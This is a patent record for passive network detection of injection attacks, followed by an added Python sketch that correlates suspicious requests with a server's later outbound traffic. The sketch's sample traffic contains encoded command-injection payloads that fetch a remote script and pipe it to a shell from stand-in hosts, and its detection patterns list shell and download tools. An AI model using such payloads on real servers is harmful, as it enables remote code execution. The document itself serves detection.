US 11,706,233 B2
Detecting injection attacks using passive network monitoring
Benjamin Thomas Higgins, Shoreline, WA (US); Jesse Abraham Rothstein, Seattle, WA (US); Xue Jun Wu, Seattle, WA (US); Michael Kerber Krause Montague, Lake Forest Park, WA (US); and Kevin Michael Seguin, Seattle, WA (US)
Assigned to ExtraHop Networks, Inc., Seattle, WA (US)
Filed by ExtraHop Networks, Inc., Seattle, WA (US)
Filed on Mar. 26, 2021, as Appl. No. 17/214,555.
Application 17/214,555 is a continuation of application No. 16/424,387, filed on May 28, 2019, granted, now 10,965,702.
Prior Publication US 2022/0021694 A1, Jan. 20, 2022
This patent is subject to a terminal disclaimer.
Int. Cl. H04L 9/32 (2006.01); H04L 9/40 (2022.01); H04L 43/0876 (2022.01)
CPC H04L 63/1425 (2013.01) [H04L 43/0876 (2013.01); H04L 63/1433 (2013.01); H04L 63/1466 (2013.01)] 17 Claims
 
1. A method for monitoring network traffic using one or more network computers, comprising:
determining one or more requests as suspicious that are provided to a server in a monitored network based on one or more characteristics of the one or more provided requests, wherein correlation information is determined for the one or more suspicious requests;
employing one or more characteristics of one or more dependent actions performed by the server to provide other correlation information for the one or more dependent actions, wherein the one or more dependent actions are evaluated for association with anomalous activity based on the correlation information and the other correlation information, wherein the anomalous activity comprises an injection attack based on malformed information included in the one or more suspicious requests that is associated with one or more malformed shell instructions, malformed command instructions, or malformed inter-process communications associated with the one or more dependent actions;
determining other malformed information that is included in the one or more dependent actions based on an association with the malformed information that is included in the one or more suspicious requests;
employing one or more characteristics of the one or more suspicious requests to provide one or more correlations associated with the one or more suspicious requests;
providing the evaluation of the one or more dependent actions for anomalous activity based on the one or more correlations associated with the one or more suspicious requests; and
providing one or more reports that include information associated with the anomalous activity by the server and the one or more other servers in the monitored network.
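Read as a pipeline, claim 1 is: flag a request by its own characteristics, derive correlation information from the malformed part of it, watch the same server's later dependent actions for tokens that came from that malformed part, and only then report. The Python below is an added illustration written for this page, not the patent's or ExtraHop's implementation. The record layout, the shell-metacharacter heuristic, the 30-second correlation window and the sample traffic are all assumptions made here so that the logic runs offline.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set
from urllib.parse import unquote_plus

# Constructed record shapes (assumptions, not the patent's data model): what a
# passive sensor could reconstruct from mirrored traffic. Timestamps are
# seconds on a single clock.
@dataclass
class Request:
    ts: float
    client: str
    server: str
    uri: str      # request-target as seen on the wire, still URL-encoded

@dataclass
class DependentAction:
    ts: float
    server: str   # the monitored server, now acting as a client
    dest: str     # peer it connected to, or name it resolved
    detail: str   # e.g. "GET /x.sh", "DNS A evil.example", "TCP 5432"

# Heuristic request characteristics (assumption): a shell metacharacter followed
# by a command token inside a parameter value is not something the application
# itself would emit.
SHELL_META = re.compile(r"(;|\|\||&&|\$\(|`|\|)")
CMD_TOKENS = re.compile(r"\b(sh|bash|curl|wget|nc|ncat|powershell|cmd\.exe)\b", re.I)
# References an injected command usually carries (IPv4 literals, hostnames,
# dotted file names). These become the request's correlation information.
REF_TOKEN = re.compile(r"\b(?:\d{1,3}(?:\.\d{1,3}){3}|[a-z0-9-]+(?:\.[a-z0-9-]+)+)\b", re.I)

def correlation_info(req: Request) -> Optional[Set[str]]:
    """Return the malformed tokens of a suspicious request, or None if it looks benign."""
    decoded = unquote_plus(req.uri)        # %3B -> ';' etc.; payloads arrive encoded
    m = SHELL_META.search(decoded)
    if not m or not CMD_TOKENS.search(decoded[m.start():]):
        return None
    # Only the injected tail counts: tokens before the metacharacter are the
    # legitimate parameter value and would otherwise correlate with normal
    # dependent actions (a real ping of the supplied host, for instance).
    injected = decoded[m.start():]
    return {t.lower() for t in REF_TOKEN.findall(injected)}

def find_injections(requests: List[Request], actions: List[DependentAction],
                    window: float = 30.0) -> List[Dict]:
    """Correlate suspicious requests with the same server's own later actions.

    A finding is raised only when a dependent action of the *same* server, within
    `window` seconds after the request, carries a token from the request's
    injected payload: that shared token is the "other malformed information"
    tying the action back to the request.
    """
    findings: List[Dict] = []
    for req in requests:
        tokens = correlation_info(req)
        if not tokens:
            continue
        for act in actions:
            if act.server != req.server or not (req.ts <= act.ts <= req.ts + window):
                continue
            haystack = (act.dest + " " + act.detail).lower()
            matched = sorted(t for t in tokens if t in haystack)
            if matched:
                findings.append({
                    "client": req.client, "server": req.server,
                    "request_ts": req.ts, "action_ts": act.ts,
                    "action": f"{act.dest} {act.detail}", "matched": matched,
                })
    return findings

def report(findings: List[Dict]) -> List[str]:
    """One line per finding, the shape a reporting step would hand to an analyst."""
    return [f"{f['server']}: injection from {f['client']} at t={f['request_ts']}; "
            f"server performed '{f['action']}' {f['action_ts'] - f['request_ts']:.1f}s later "
            f"(shared tokens: {', '.join(f['matched'])})" for f in findings]

# Constructed sample traffic (not captured data). Addresses are documentation ranges.
REQUESTS = [
    Request(100.0, "198.51.100.7", "10.0.0.5", "/search?q=shell+scripts&page=2"),
    Request(200.0, "198.51.100.9", "10.0.0.5",
            "/ping?host=127.0.0.1%3Bcurl+http%3A%2F%2F203.0.113.5%2Fx.sh%7Csh"),
    Request(300.0, "198.51.100.11", "10.0.0.5",
            "/ping?host=1.1.1.1%3Bwget+http%3A%2F%2Fevil.example%2Fp"),   # no follow-up seen
]
ACTIONS = [
    DependentAction(150.0, "10.0.0.5", "10.0.0.20", "TCP 5432"),        # routine backend call
    DependentAction(201.5, "10.0.0.5", "203.0.113.5", "GET /x.sh"),     # stage-two fetch
    DependentAction(203.0, "10.0.0.6", "203.0.113.5", "GET /x.sh"),     # different server
    DependentAction(205.0, "10.0.0.5", "10.0.0.20", "TCP 5432"),        # routine backend call
]

if __name__ == "__main__":
    for line in report(find_injections(REQUESTS, ACTIONS)):
        print(line)
```

Nothing here needs an agent on the server: both inputs are things a passive sensor already has, the reconstructed request and the server's subsequent outbound flows. The third request is suspicious by its characteristics but produces no finding because no dependent action of that server references its payload within the window; the claim's structure reports the correlated pair, not the suspicious request alone, which is what keeps scanner noise out of the report. The window and the token heuristics are the parameters a deployment would have to tune.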